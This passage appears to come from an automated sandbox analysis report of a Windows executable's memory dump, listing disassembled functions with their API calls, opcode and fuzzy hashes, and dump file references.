                                                                                                          • Opcode Fuzzy Hash: 724c1307a424aa64d7ec785b38004344e942ca495f8938faddac9eaa56cbd202
                                                                                                          • Instruction Fuzzy Hash: 1EF09072A81B099BD7106B65A90676E6BE16F503F4F21A209A425BB1C1CB7C4A019F51
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SleepTimetime
                                                                                                          • String ID:
                                                                                                          • API String ID: 346578373-0
                                                                                                          • Opcode ID: 1782603d621ae3f9005256ba7ee195b285d1db8bb647e7c778c59b8079d20b40
                                                                                                          • Instruction ID: e28ffb7457a1361b3318257766bd38b8f2af3597c55ccfaed9a3d4fd19e0cd9e
                                                                                                          • Opcode Fuzzy Hash: 1782603d621ae3f9005256ba7ee195b285d1db8bb647e7c778c59b8079d20b40
                                                                                                          • Instruction Fuzzy Hash: 6CF012352406129FD350EF69E455BA6B7E4FF45750F00542AF42AE7352DB70AC44CB91
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 00E65EB4
                                                                                                          • __ftell_nolock.LIBCMT ref: 00E65EBF
                                                                                                            • Part of subcall function 00E68D58: __getptd_noexit.LIBCMT ref: 00E68D58
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2999321469-0
                                                                                                          • Opcode ID: eb2828239d973a2e6409cf084d30a5ce5a2905c1e4a8520c16bbfa65b33fff2c
                                                                                                          • Instruction ID: dfa9c1f40c77e145003ca1d2379571dda7b21645ef3fec0c80956f064028ecce
                                                                                                          • Opcode Fuzzy Hash: eb2828239d973a2e6409cf084d30a5ce5a2905c1e4a8520c16bbfa65b33fff2c
                                                                                                          • Instruction Fuzzy Hash: 02F0EC32AD16199BDB00BB74AA0375E76D06F113B1F217306B020BB1D2CF784F019B55
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E55AEF
                                                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E55B1F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell__memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 928536360-0
                                                                                                          • Opcode ID: 4c0030d57ff10727dc10b6d0b82a199c21f408d7b9da02b4a08f742a4a55b716
                                                                                                          • Instruction ID: a17b8039f9e0ba2aa0b3f075e2e70e70f79f32b625225dd272d2eada483ed7ab
                                                                                                          • Opcode Fuzzy Hash: 4c0030d57ff10727dc10b6d0b82a199c21f408d7b9da02b4a08f742a4a55b716
                                                                                                          • Instruction Fuzzy Hash: 93F0A771C0930C9FD7D29B64DC49795B7BCA70030CF0001EAAA48A6292D7711B88CF51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString$__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 207118244-0
                                                                                                          • Opcode ID: d3ebb3a062f456425e5ed489281ed12b9a64df221d4ab002b26700508c8f7479
                                                                                                          • Instruction ID: 85fcae31c8b6d82291aded6d28afab0f5e849c835db572da1981ed737dd9ebdc
                                                                                                          • Opcode Fuzzy Hash: d3ebb3a062f456425e5ed489281ed12b9a64df221d4ab002b26700508c8f7479
                                                                                                          • Instruction Fuzzy Hash: 73B15C34A0410ADFCB14DFA4D851DEEB7B5FF48714F20A05AF915BB291EB70AA45CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
                                                                                                          • Instruction ID: ffcbf291b2340ed36a58be33a8e0038508836e158b3524921e48cc75835e33cf
                                                                                                          • Opcode Fuzzy Hash: 98adbf28a40f5d0034c1903875cd77dbebdb399a9fea0f49e0ac0170b9371455
                                                                                                          • Instruction Fuzzy Hash: F061E170640606DFDB14DF50E881ABAB7E5FF88324F19907DEA1AAB281D774ED40CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 20ab37a047499bcb88f0b08502db4e7e0003bbfc9ea4e9c8bd17f170b67751e0
                                                                                                          • Instruction ID: 5fe840d4486d64cac8eae899c98a1706467d42e89ecd3786e15ffefe74f05130
                                                                                                          • Opcode Fuzzy Hash: 20ab37a047499bcb88f0b08502db4e7e0003bbfc9ea4e9c8bd17f170b67751e0
                                                                                                          • Instruction Fuzzy Hash: A951BC35704604ABCB14EB68C995FAE73E6AF45354F14A4A8F84ABB392CB30ED05CB50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                                                          • Instruction ID: ebe2f7f1d15f22794d3527a136a8684ce793946bd2c038c1f8a08324929be2d0
                                                                                                          • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                                                                          • Instruction Fuzzy Hash: 8731C175204612EFC725DF28D480A62F7E0FF08391B14E969ED9AAB751E730EC85CB90
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00E541B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: bd2dca6a3fd72b585ee3d8725cae635526eaf2652173d7d2f47577ab564ebdd0
                                                                                                          • Instruction ID: c66b641df584edf307a59ab999bb8a4e0886b2fa77ec0b31570a9feed497e6cd
                                                                                                          • Opcode Fuzzy Hash: bd2dca6a3fd72b585ee3d8725cae635526eaf2652173d7d2f47577ab564ebdd0
                                                                                                          • Instruction Fuzzy Hash: 30318DB1A01A16AFCB18CF2DC980A9DB7B1FF54319F149A19EC15A3750D770BDE88B90
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 76efd6d4542d4f648188bfde3fdce1ab4543cdc4d171f4d335d3518e73e92496
                                                                                                          • Instruction ID: 8a39b8fbade34bc3b9fb0062d3105e9c89731b7c9730dbeb558b10bfa0f12d3a
                                                                                                          • Opcode Fuzzy Hash: 76efd6d4542d4f648188bfde3fdce1ab4543cdc4d171f4d335d3518e73e92496
                                                                                                          • Instruction Fuzzy Hash: FC411974508351DFDB24DF14D584B1ABBE1BF85308F0999ACE889AB362C371EC85CB92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E54B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E54B63
                                                                                                            • Part of subcall function 00E6547B: __wfsopen.LIBCMT ref: 00E65486
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E527AF,?,00000001), ref: 00E549F4
                                                                                                            • Part of subcall function 00E54ADE: FreeLibrary.KERNEL32(00000000), ref: 00E54B18
                                                                                                            • Part of subcall function 00E548B0: _memmove.LIBCMT ref: 00E548FA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1396898556-0
                                                                                                          • Opcode ID: ed8736f6bbd0307e0a877942c8334dc5b65363a0087eb5203332647f3c2c2589
                                                                                                          • Instruction ID: df92140b0136eee7d90cf7469271c9995f8700f37d49c4fb0fbf6d46b9b6299d
                                                                                                          • Opcode Fuzzy Hash: ed8736f6bbd0307e0a877942c8334dc5b65363a0087eb5203332647f3c2c2589
                                                                                                          • Instruction Fuzzy Hash: 8A110472650305ABCB14FB60CC02FAE77E99F4070AF105829F841B61C3FA709A48A794
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClearVariant
                                                                                                          • String ID:
                                                                                                          • API String ID: 1473721057-0
                                                                                                          • Opcode ID: 7be9f48a248b825ee7b5642c2f3d1590e22bae9f310d288f2bd35455288756f1
                                                                                                          • Instruction ID: 65d10b04c680e3d853ee4e95ffff9933eab2a69dce34d56e4c47c86ea387c969
                                                                                                          • Opcode Fuzzy Hash: 7be9f48a248b825ee7b5642c2f3d1590e22bae9f310d288f2bd35455288756f1
                                                                                                          • Instruction Fuzzy Hash: 0721F474508341DFDB24DF14D544B1ABBE1BF89308F0999ACF88A67362D731E849DB92
                                                                                                          APIs
                                                                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00E53CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00E54276
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: d8cdd3417b836179e06d70530ffc200518a65aecddc11ebe8079a13f5c9edfa7
                                                                                                          • Instruction ID: ee96c74c4bd12cc8c0b76ea388b8440a991a590c452f8625021fbeb35d61be9b
                                                                                                          • Opcode Fuzzy Hash: d8cdd3417b836179e06d70530ffc200518a65aecddc11ebe8079a13f5c9edfa7
                                                                                                          • Instruction Fuzzy Hash: D5113D752047119FD320CF55D480B62B7F5EF44719F14D91DE8AA9B6A0D770E889CB60
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                                                          • Instruction ID: 49882e14e43c6e4050ca469b12a5b4c9a6329898e34507b8ca7feabe880b986f
                                                                                                          • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                                                                          • Instruction Fuzzy Hash: 8401F9722457016ED7255F38DC02F67BBD8DB447E0F10992EFA1ADA1D2EA31E4448790
                                                                                                          APIs
                                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EB4998
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 1431749950-0
                                                                                                          • Opcode ID: fbd7d25b188d98a9d5b2e95bd193ae36cfe0693a7872168dd8ef0904629b8ad7
                                                                                                          • Instruction ID: a3df1380391ab589ed01e2f0c9188353521638f1ec51a30c217c12f11058c815
                                                                                                          • Opcode Fuzzy Hash: fbd7d25b188d98a9d5b2e95bd193ae36cfe0693a7872168dd8ef0904629b8ad7
                                                                                                          • Instruction Fuzzy Hash: 75F0A475608104BF8B10FB65D806D9F77FCEF49320B001056F804AB2A2DE30BD41C760
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E60FE6: std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                            • Part of subcall function 00E60FE6: __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                          • _memset.LIBCMT ref: 00EA7CB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 525207782-0
                                                                                                          • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                                                          • Instruction ID: 30dcccae1244d3bee2905ae791898573149287898dfbb72ce0b0d140a118324f
                                                                                                          • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                                                                          • Instruction Fuzzy Hash: 7801F674648200AFD321EF5CE941F46BBE5AF5D350F24845AF5889B392DB72E800CB90
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fseek
                                                                                                          • String ID:
                                                                                                          • API String ID: 2937370855-0
                                                                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                          • Instruction ID: add93bee2d85bad46ac0258fd5ffe121ef59e4e2bc1bfc574b688409e4e639ab
                                                                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                                          • Instruction Fuzzy Hash: 73F085B6500208BFDF108F85EC00CEBBBB9EB89324F144598F9046A211D232EA21DBA0
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00E527AF,?,00000001), ref: 00E54A63
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID:
                                                                                                          • API String ID: 3664257935-0
                                                                                                          • Opcode ID: 81924fe67ff1f63b3d4517cebbed6899c293e2a917a1c793190d85254fb9af5e
                                                                                                          • Instruction ID: b6d17050242572a85d402012e3ed71f5f00ec66eb3440ad3e2a0b9b636e55612
                                                                                                          • Opcode Fuzzy Hash: 81924fe67ff1f63b3d4517cebbed6899c293e2a917a1c793190d85254fb9af5e
                                                                                                          • Instruction Fuzzy Hash: B2F058B1141701CFCB748F24E480856BBE0AB0431A310AD2EE596A2652D3319988CB04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                          • Instruction ID: c726f735b34162a3a75693c61a39fb0ab00af6621cc572c4bc0a655e49802ca0
                                                                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                                          • Instruction Fuzzy Hash: C6F0587240020DFFDF04CF80C941EAABB79FB04314F208589FC189B252D336DA21AB90
                                                                                                          APIs
